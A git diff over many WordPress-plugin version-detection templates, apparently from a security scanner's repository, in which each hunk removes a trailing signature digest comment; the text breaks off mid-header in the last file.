a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036cc66d181fb06ce72a320b042b7d550382a8cfa3efbb23700c6789f86f7237e0221009086fa6d73425624829c00e7a79119a09c14539aea7e0e9dbed0e952c647221a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index af1cbb5cf8c..bedb85a0eba 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000b14f288c81f9421b2c30b343f631d99c436c250edaf810f084224c1adee4cc0220352e66a35411c9883500585d77937335e9c844c6f0454e699c8429468703242e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 5c6d0b995c0..45bbbc71df5 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091e2e8b922c8a2026e6602cad8b94edcdf612fed6afa4a2e6af0613c2909558302206e61b7d2203ba5b26d018001e0c8761a682b1949d58611cd0e2fa940c1866f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 2c9e58e1c58..03befac73ed 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b885cd246f9fb3216f360417f9e86e4781c6a614edb92dd43d55fadd4b115657022066301b2be2a4ca80d489db7e3ae5b9bf620c11283e4dfa95de8b0781ac0e5572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8eca733fa97..e1f00931279 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220103fe5c28ad3ac28cb238e54d600b136fd135520a3e33b3bca96bb21d76a45af022100bd35203cbe8aea1f3fb804c43f34cb6a666e1356cf3fa21ed91b1a4bead4371d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 804e0a64b3f..0db316d66d6 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fb74667a3b653dfac98bd348a2e3dea60c627366145def6eb65e7b22ffcf6e1d02210099746b49689cdc5fe242d9a789f8995b82889c40264aa820089b6c339d76f055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 919e7838794..135639253d8 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6accdbfccd442da9a0430f5a15e3f682c2db0b9b7d190d79a4a8cf8dc489051022100994bb2518264867bda598c47384d06dbb5fb0ca8ebba776765a59b61b3f51adc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 88c9255d636..540fbaf9ace 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022068a08f68017ddf6a92c6752d7913e7d0630497b14817f15cefd84d69bb54f37802202dcafeb04a3bc9c2452487d7cb7cdd0600b5abf41bb25049491aed0c66bc5d05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7aa1c995aed..7e71b4736fd 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022029cbb84d9753207b18fe550ed6c5f26c1472fed014e408c91b903e705d81fd46022064f5b4779f2ab2c414f007a1ab093d74608e470f104794237a9b0c54fff5e657:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 84d1a3c0f2c..88a70b24789 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f043fd5fa3349fd243eecf64fd67b8a86564d88ef94ec7346fa108e89788cad022100a8484d125349c90c9b11f76983b5c89e4e4f27f3644bd6d899e92c35b38f4d00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 26a7ab1381a..fc498e67e6d 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df97bbba45f43516c28f7559b51dea13b23e354a163006d14a6bfd3b2c6a514b022012cb2669d4267f8ddcf014c5ab48dfdc6cbe70326b3edc03b8e3367c3fe32ea6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 4edb7b77ad1..465aa93d578 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f627ee87b0a111c81039f054a65e8ed24c319fd04029b98a38269655cc81a914022100ed088677b7cf4d24d94851deb2ec72feeb772f1cbffe9b1d2a797e1437dca62f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 08285411282..2a1b0e57a90 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008017f11f633f13e08b8d231d95e8a66cd0398df41b6dba40c8344da5e4d4f61602203a222d82cf95d18df709be0af986c0b73e0ba3dbec8e74a984ee62e1138f04e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index ec01702d316..df35e8b415d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b824556500fe06c2369b62667587ef060da943470a34116c2612997c869b29e022100be277a0777ec4259cfa64f0e836ab9aac9406ad633c0eb4823ab13428816bbe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 0ac50c7314d..033cc4bc3d2 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022061b684b6ace70738b9880c5f8e897231e015b6db0dc0c7b5257ff0e8b81fc6b7022100d79c3ac7cd7e454377234fedb4b618952c1a84aac54ac3da9b9d0d656473acd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 0065f436151..945ab6ad03c 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a004530430220381ad88368fd5554f56505dbc7fbb2a28186cb3e7336272e36d3af3392eac7dd021f614302bb216c10edb6549d3e740daad905f3dc2056986dc7843cff1fadbf5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index dedb6d5d513..2072b51ab9c 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079bb853a4a0cee414cc04176eb95725e4c3f7c930132761c159ff66fc4fe12d802206e7ae07ac119f0a50c59908c36d50b1d68dd2079bd26cd60d3262de7813e995b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 4f4741ab15d..b509d8cc670 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e72baefdc21360e1c727e9912a5560abbd45f65a48586c0995aa13fe8720008022053906610511a39d3ab476b6d4b0b0ea085d8f19657f27e56b3933f111d03f2e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 12ba6ea72a1..c984479bde5 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2e220dadab75ca56250423357fb28228696421df601f8cdd9c41ac4918dd6ec0220211686b133e1ba0b61794ad682fbd51500a70fd5ca6ed596f610201b738a109f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index fe484765505..a3870175c7d 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017e742c7125f4e530302578b6f9008547e274e1247448c72352561433b8bae1f022100a1c5db93ae7d9ef2f2492e9598d68898dc34b603ac4890fbeda3d7da2e3f8c3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index e172b25317a..f5f3818ea24 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c3a8d06708e4779fa04e3122480e7733957436e3ef912225af741191f6434963022032271bd6e6ae8a57a47108403cb114f73f828e027120600a8a5b4ce22eadb5b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index a8a2534f692..7e5b54c12c7 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016f1e8a8e7bfa27404655073880a91535d35cd9cd4f120c2fb50762809f57dab0221009628bfa0a7804b25bf2740399b6a57a15f20d416a5e31e6b064c8b2599a26381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 2c382fe9222..59effd09f64 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eea30c5e2d372a45905121d1397b38adb7d0a7f0982996c8b492c5b1fd7f5af002203dd2bf76883dd41ec20b617c74370020014013cca19754efd68888f12983ad73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index f6068a5a396..833207dcff4 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009a721a748dec3cb189dd1c8b409339aec87a00b15b3c069a8a505bd02e993f13022100cc4cc4c153fe551cef5d6313b92bea7472e37be68637cae0c0292b9655715ade:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index f2b79c186a3..b7ea2d38d1c 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098181c08941bd8ad4247b9b4c32ad04b61bd4b71dadf164a94aa8f10a858813a022067b117788915718cb4a37ae68999a114548c7c9513355fabcf9a7ac16a3d3802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index ef0b86899f6..2131dbe751b 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b8b5e58e8caf38be8445341c6c08487a77f136da60d59c5ebf9fe8457c1fd222022100cdf24d7b2e6838058d3bb619802fbc9673aec925f45bbaff69ed52ef1c72d787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index d9d78624732..73d644c5e47 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079b9363108db9cb5fafe22adbd418c6e415e79f5733a5f3f403c7c4ac9c1724e0221009351fab80b2e98dbd64df962eecd64b076ddeb5895e965054bb49befa24bbbae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index d16447f8bdb..7b0593dcb76 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f47fd2f7785bf7066283f3acc7e97a858ebe09d07a017c6dbdc7028f13b99949022100cf0ce81dac8663ed086e2062e11a1d1e3974d134665ef4b5abecb984a4226398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index f65342b2ae3..6f65d087e49 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e3fef602f1440f42cdd4881832e2fda4092c09976e3acb8491f372eb4310e38022001b789bd6c63171818753a53bb96b3af42fc2ffb24ea32e95e4da79f1871baff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index e1ceb1eeeb0..783cdd283de 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bda966e2f74559d0645c504021b0f47d3d01bf97bbbb35cbe5d298c29c4e968f02206f4f9bb307ff4a187b10165d68e452ee46e8a28bcde0d9312a4c80e5a3c8ed33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index f385af75b22..05121854b3e 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022041db9392026455be1d7ba8bb8e558e78b6765693982c20269d187a7d5435127a022100a4412e1cdcb0caba5d7e3ed32f4bc9f625b7fa819a42b08986783cfdb3e838b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index d55320da3c3..72f52edcd44 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3774e3651f2b0bb2797946add601ab969f49fdde41e587d0bdcf550597c1437022100bfa3f14a76c4fff836a01fa0639297894459a6e019e5c5b16a35dc0e0cc68fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 1b9e456becc..4cf45ebd74c 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be5877ff1833524246b20116d568e0a4f856cf36a1c1c0c845eceb1cdc851c41022100b8afba9fa19b3f95384cdc6624a3c6e4dfd26725e16348a9cc59bfd38c4299a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 231e8a0331d..3d6863e074c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b9fd797e55a6779db63351cefe1a9766011e49f49d352f065a7bc4140da0157c02202433ad11f380997a3de5e2ecec111dbdf6ba31763c447f988e1f6a740d1dd9af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 73838c59fb6..79e2813c5eb 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e6f814576d996edbdc93820332afb882e7bcecda634b6bc761ad3206c877e3e022100979f02c77cab178d0b3c0840ca33320329bc916e4e2716470c64f1a902acd2f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index f790e3855d1..ab9a0f1ae30 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220342561b9c90ae564534028145058258bc286720e13e2208d6e4550655af0f21e022100d9409774e1cb7a99066406e96f73d6f0ea77e7b6fdf2e2999ffedd0e55f24d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 245f2db21c3..5d3adf7c27a 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207036bdc949e6e7fd961d4bd1c93170bdc8fd25fbe3edacef8005369a31ebe7dd0220071f780f263d017649cd550762f7b9bdb76ccf0bf8567c0f72b9a8db66d2f95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index e0039c284d6..eda1d27f047 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec42e1a0b5ce81a038e98d7edea577f5b262b00805e86581841fb3937b3b4e9d022100b5a3779aeab5916e636762b528b3f940c0815c63d0df611e7b3f7d562aac9c82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index f1e145e3cd2..16dfc8df5f5 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201152539a2828be423e391471184e7c6d6a54c2a6c204fadf68a6257d55c5dc8c0221009d3fe22ce4e1006258105bb29088fee8d0212b93289c95c79185b3203f128286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index c1ccff22ab6..4b7600ea697 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005058ca82ea5e0f4468161812de0fe3857e93d8b5b7f0e294009a13ce54fca7602203fc441deeba8d222db2b22401384196befada08c36e4e6abac9760c12f2f6e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index ff5652bac4b..2ccd4dbce85 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025000ab0fff649e3fbdf51bf18a1188300833b881c9ebdf9c24f59a24812574d022100ef961783c5b562970cf5961f173a07c29fd53012d2808b29ddf67e75e09b90c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 00a83df8d44..02ceb224d1c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100872d5af466f6bcd56c9987cc3c4c734edde334716c6b6c992fc10106470801f102202c0149996c7169670edd6ef44af83261031b1b209049da6c73df735f40b45dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 2cce0d90c10..367d587ce2b 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206968f09eeefaeb426385add158d93864313625b9ab69b51bf6931f8b0ebd7a04022049c118f7727ec312472645df35205ca66e9059ee6b8a2eb83427562d3d43fa5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 478f4fbc9a7..feed730ee0c 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e76b98aad6db9fd9d746d4dde4820b7c66cbd56bd0f657edf7d46a050161c58e022100e375e7a1c0f3d25e45f1f3842d7e39f7a58fbc92d94d10b9beba3a6b5407997f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 2d725c755c0..9b2841e7ca7 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220482f91a2850320030ae712c8fde420600d6237811a4a5893940ef0861f23545002207da145acf033c5457e53d4c75addc71216f4d652a1277dc7bb628ae6a44bba0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 6debae1cf19..42be14c5dfe 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f0daca2ac7a89e631b89fea3be3ad922b6305eeba9fd1a4c6d03265ae6ec93c022100929d28ac1d120aeba680560a2c133679c649b98248b630826a3f161815cce554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 0dff8a56069..4e0cd86c3f7 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e120233c3585ec5fbe280b3bf0fc92cfd7cfcb44d2d00ae3e0d3a02a0ff7c9d7022100eed72fd3074c2115bed8755953cbf8a20f22e09ea96a448a3b40112d2364ec36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 4a0e24ad7ba..59eadc5e6e7 100644 --- 